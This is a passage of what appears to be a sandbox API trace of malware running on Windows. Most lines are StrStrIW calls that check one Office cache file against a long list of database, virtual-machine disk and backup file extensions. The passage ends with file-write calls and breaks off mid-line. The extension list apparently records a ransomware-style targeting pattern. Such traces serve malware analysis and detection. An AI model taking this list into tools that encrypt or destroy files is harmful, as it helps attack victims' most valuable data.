lpSrch=".cpd") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dacpac") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dad") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dadiagrams") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".daschema") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-shm") returned 0x0 [0154.311] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-wal") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db3") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbc") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbf") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbs") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbt") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbv") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbx") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcb") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dct") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcx") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ddl") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dlis") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dp1") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dqy") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsk") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsn") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dtsx") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dxl") returned 0x0 [0154.312] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".eco") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ecx") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".edb") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".epim") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".exb") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fcd") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fdb") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fic") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp12") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmpsl") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fol") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp3") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp4") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp5") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp7") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fpt") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".frm") returned 0x0 [0154.313] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gdb") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".grdb") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gwi") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hdb") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".his") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ib") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".idb") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ihx") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itdb") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itw") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jet") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jtx") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexi") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexic") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexis") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lgc") returned 0x0 [0154.314] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lwx") returned 0x0 [0154.315] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maf") returned 0x0 [0154.315] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maq") returned 0x0 [0154.315] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mar") returned 0x0 [0154.315] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mas") returned 0x0 [0154.315] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mav") returned 0x0 [0154.315] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdb") returned 0x0 [0154.315] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdf") returned 0x0 [0154.315] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mpd") returned 0x0 [0154.315] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mrg") returned 0x0 [0154.315] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mud") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mwb") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".myd") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ndf") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nnt") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nrmlib") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns2") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns3") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns4") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nsf") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv2") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nwdb") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nyf") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".odb") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".oqy") returned 0x0 [0154.442] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".orx") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".owc") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p96") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p97") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pan") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdb") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdm") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pnz") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qry") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qvd") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rbf") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rctd") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rod") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rodx") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rpd") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rsd") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sas7bdat") returned 0x0 [0154.443] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sbf") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".scx") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdb") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdc") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdf") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sis") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".spq") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sql") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite3") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlitedb") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".te") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".temx") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tmd") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tps") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trc") returned 0x0 [0154.444] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trm") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udb") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udl") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".usr") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".v12") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vis") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vpd") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vvv") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wdb") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wmdb") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wrk") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xdb") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xld") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xmlff") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abcddb") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abs") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abx") returned 0x0 [0154.445] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdw") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adn") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db2") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fm5") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hjt") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icg") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icr") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lut") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maw") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdn") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdt") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vdi") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhd") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmdk") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pvm") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmem") returned 0x0 [0154.446] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsn") returned 0x0 [0154.447] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsd") returned 0x0 [0154.447] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nvram") returned 0x0 [0154.447] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmx") returned 0x0 [0154.447] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".raw") returned 0x0 [0154.447] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qcow2") returned 0x0 [0154.447] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".subvol") returned 0x0 [0154.447] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bin") returned 0x0 [0154.447] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vsv") returned 0x0 [0154.447] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avhd") returned 0x0 [0154.447] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmrs") returned 0x0 [0154.448] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhdx") returned 0x0 [0154.448] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avdx") returned 0x0 [0154.448] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmcx") returned 0x0 [0154.448] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".iso") returned 0x0 [0154.448] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.448] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0154.552] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 